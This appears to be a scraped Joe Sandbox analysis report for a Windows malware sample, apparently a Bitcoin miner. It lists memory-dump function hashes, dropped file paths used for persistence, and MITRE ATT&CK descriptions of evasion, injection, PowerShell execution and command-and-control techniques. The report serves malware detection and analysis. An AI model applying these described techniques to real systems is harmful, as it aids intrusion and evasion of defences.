Source File: 00000009.00000002.2698660187.00007FF848F35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f35000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f590d379cf2389e425490ec8b0029c95b7c140d0d7d793351cc4d2e2b86c189
Instruction ID: ddadaf4dd702cd3856f2652097d13758ab9d52546e85099d7d8af732fd655e86
Opcode Fuzzy Hash: 9f590d379cf2389e425490ec8b0029c95b7c140d0d7d793351cc4d2e2b86c189
Instruction Fuzzy Hash: 6BF08C35D0D289AFEB01EF6484845ADBFF0FF49354F6442A6C00197282EB786A88CB84

Function 00007FF848F6E800 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43e3792c1922a74d472820cb3e96e79af46cb9aaffe3084d45ee2735de5cb6c2
Instruction ID: a83e50648136ed13ec35b25ae40bf274e74cfc69c940b22fcc1c502efbeda414
Opcode Fuzzy Hash: 43e3792c1922a74d472820cb3e96e79af46cb9aaffe3084d45ee2735de5cb6c2
Instruction Fuzzy Hash: 59E0DF31E28F1A0BF3B8B27E28452F122C0DB48370F58047AA809C22D4FA9CACC24385

Function 00007FF848F8A41D Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9159f09abf98c9ceed732b2554f355686214f7c3153846b36216dac7539eee1c
Instruction ID: f3c6f0f6d8ba9b2cbf44a0c13e87d000208ad351484c2ffc5bb2127b907e82a3
Opcode Fuzzy Hash: 9159f09abf98c9ceed732b2554f355686214f7c3153846b36216dac7539eee1c
Instruction Fuzzy Hash: A5D05E9A84F6DA4EDF0322391C244E47F50DA234A1BD944EBC084CA1E7DA4F18EF4392

Function 00007FF848F3ABE9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f35000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e56b6bd4a3fc24b3dc3edd1281fa1497d90faaadade69155a4ce7aacee6acbf3
Instruction ID: 620989fd3e11bd8eba4220502d4671b4006dc52a4aa4f3530f6699cbef363d1d
Opcode Fuzzy Hash: e56b6bd4a3fc24b3dc3edd1281fa1497d90faaadade69155a4ce7aacee6acbf3
Instruction Fuzzy Hash: 88E09230C0E7965FE326E774801A26ABFD0AF06360F4404FFD049CB2A2DB6C1C809705

Function 00007FF848F31623 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f30000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7ceb254790d38333a240bee535ebfbcfe707ce7e839761a4350306dab72022
Instruction ID: 0e96bd11c7a7eed85041fba44172e2d235de06f8be305199254ec78a46a4aafe
Opcode Fuzzy Hash: 6c7ceb254790d38333a240bee535ebfbcfe707ce7e839761a4350306dab72022
Instruction Fuzzy Hash: FFE01A34A099498FCB89EB6CC4A9AA87BE1EF5D31074500B9E00ADB2A5CA389C408B10

Function 00007FF848F35BB7 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f35000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf49b0cfe7a320621b76040d5241c8a1972eba122ca00ae4dbc585c62c4782c
Instruction ID: ce74497aa8dc2cbac34de9036fcb0e14889c22ac6caa33d79a82c0fd35084b3e
Opcode Fuzzy Hash: faf49b0cfe7a320621b76040d5241c8a1972eba122ca00ae4dbc585c62c4782c
Instruction Fuzzy Hash: 45E0EC7181D686AFD74A9B7444571A97AA0AF45340F0404FFE4498A1D3CA2C14854715

Function 00007FF848F6EFE8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac999b28e9968c1296bd8660828944e701b32a07f68799231fb9c5ebf7bf4fd
Instruction ID: 9214684120ef671965625ba8c9da049aee7f876210e6f2497476572b096c176e
Opcode Fuzzy Hash: 8ac999b28e9968c1296bd8660828944e701b32a07f68799231fb9c5ebf7bf4fd
Instruction Fuzzy Hash: 36D0220084F3E20FC3026338B4A28FB2F60BE0232C70C86EBD0884E483CA0CA452C27D

Function 00007FF848F3BB08 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F35000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f35000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdee744fa5ca4f147207f958c2fac253a5b1b55c03d385d424f9feca850f9d0
Instruction ID: 61b4d788167d79860cf74bd7e20042871b27b31d927d94991788090c340f1216
Opcode Fuzzy Hash: dfdee744fa5ca4f147207f958c2fac253a5b1b55c03d385d424f9feca850f9d0
Instruction Fuzzy Hash: 3EC04C31E1C51A4EEA54F724C4916BD51626FC9340F5594B6904E931C2CE7C3C407748

Function 00007FF848F6CEA0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8373c0bd6b6d1374926a910ae289d3ec1e4f9a0d80babbeb68c09825bb337e11
Instruction ID: 3180d2f1693f18a3b6235a09a4442d1f542b56f1c121f8739c1825d5c914d464
Opcode Fuzzy Hash: 8373c0bd6b6d1374926a910ae289d3ec1e4f9a0d80babbeb68c09825bb337e11
Instruction Fuzzy Hash: 48A00214CDB80E06D80872BA1D970947450EF89154FC53361E848901C6F98E26EE03D7

Function 00007FF848F6D900 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2698660187.00007FF848F6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff848f6b000_Current.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: decdf041ba961c2807eb94fdeec1f37ca53d75665f584898e403085dd4e5fe8d
Instruction ID: 35d88caaa9c0ccd4f3c7254f87d354f21b2726463a9350540a3bc9bb34d252ed
Opcode Fuzzy Hash: decdf041ba961c2807eb94fdeec1f37ca53d75665f584898e403085dd4e5fe8d
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report o9OIGsDt4m.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Current.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\o9OIGsDt4m.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggqhaihq.it1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k2eaersr.skl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_neenwso2.133.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogbhaost.2hf.psm1

C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe

C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
o9OIGsDt4m.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre